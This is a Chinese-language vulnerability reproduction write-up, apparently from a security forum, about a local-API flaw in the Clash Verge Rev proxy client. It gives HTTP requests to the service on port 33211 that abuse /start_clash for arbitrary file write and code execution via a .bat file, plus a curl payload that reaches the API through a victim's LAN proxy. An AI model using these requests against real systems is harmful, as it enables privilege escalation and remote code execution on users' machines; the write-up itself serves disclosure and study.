本文由掌控安全学院 - c's 投稿

来Track安全社区投稿~

千元稿费！还有保底奖励~（ https://bbs.zkaq.cn）

一、基本信息

1.1、漏洞背景

复现时间：20250429

背景：

https://github.com/clash-verge-rev/clash-verge-rev/issues/3428

1.2、clash生态

1. Clash内核●Clash是一个开源、跨平台的规则分流代理内核，用Go语言开发，核心功能是多协议代理（如VMess、VLESS、Trojan、Shadowsocks、Socks5、HTTP等）+强大的规则分流。

●本质：命令行程序，无GUI，负责流量抓取、转发、分流、协议转换等。●配置：通过YAML文件配置，支持多节点、多规则、多策略组。●功能：分流、UDP/IPv6支持、透明代理、DNS伪装、测速、订阅等。2. Clash GUI生态●Clash for Windows、ClashX（Mac）、Clash Verge/Verge Rev、Meta、Meta for Android等，都是基于Clash内核的图形界面前端，用来简化配置、管理和可视化操作。1.3、Clash Verge Rev是什么1. Clash Verge Rev简介●Clash Verge Rev是一款基于Clash内核的跨平台GUI客户端。●Verge Rev=Verge的分支/二开版本，通常会有更多新特性、优化和自定义功能。●支持Windows、MacOS、Linux等，界面现代、交互友好。2. 架构●前端（GUI）：负责用户交互、配置管理、节点展示、规则编辑、流量统计等。●后端（内核）：集成Clash核心程序，负责实际的流量抓取、协议解析与分流。●通信：前端通过API/本地端口与Clash内核通信（如RESTful API、WebSocket）。1.4、clash Verge Rev的安全性与架构●GUI和内核分离：理论上GUI和内核可以独立升级，安全性更好。●开源可审计：代码开源，安全人员可自行审计有无后门。●GUI前端：用户操作界面●clash-verge-service：本地服务进程，管理内核和提供接口●Clash内核：真正的网络代理引擎1.5、监听端口clash系列都差不多，常见clash的配置文件：clash-verge-service监听端口：小结一下，

端口号	作用	进程
7890、7891	代理流量端口（HTTP/SOCKS5）	clash-core/meta
9090	内核 API（external-controller）	clash-core/meta
33211	clash-verge-service 的本地API端口	clash-verge-service

数据流向：二、漏洞1、提权详细请求数据包，查看日志文件，提权成功

辅助测试go程序，代码，代码入口，

写入配置，

这里可以实现任意文件写入，配合多种姿势rce

针对mac和非mac文件都可以，

2、转换系统rce复现，代码已经写得很详细了。由于参数不完全可控，RCE 部分会复杂一些。可以考虑这样处理：先发送一个请求，把要执行的命令写入 bat 文件，再通过第二个请求调用这个文件即可。该思路可以用于win和mac。详细请求数据包，写入成功

第二次请求，

详细请求数据包

POST /start_clash HTTP/1.1Host: 127.0.0.1:33211Content-Type: application/json{"bin_path": "d:/clash.bat","config_dir": ".","config_file": ".","log_file": "d:/clash.log"}

3、进一步利用这个漏洞的影响范围可以更广。特别是当用户在与攻击者相同的局域网环境中开启了局域网功能时，攻击者可以利用clash的代理机制发起直接攻击。payload：

curl -x socks5://192.168.xx.xx:xx -X POST "http://127.0.0.1:33211/start_clash" -H "Content-Type: application/json" -d '{  "bin_path": "xx",  "config_dir": "xx",  "config_file": "xx",  "log_file": "xx"}'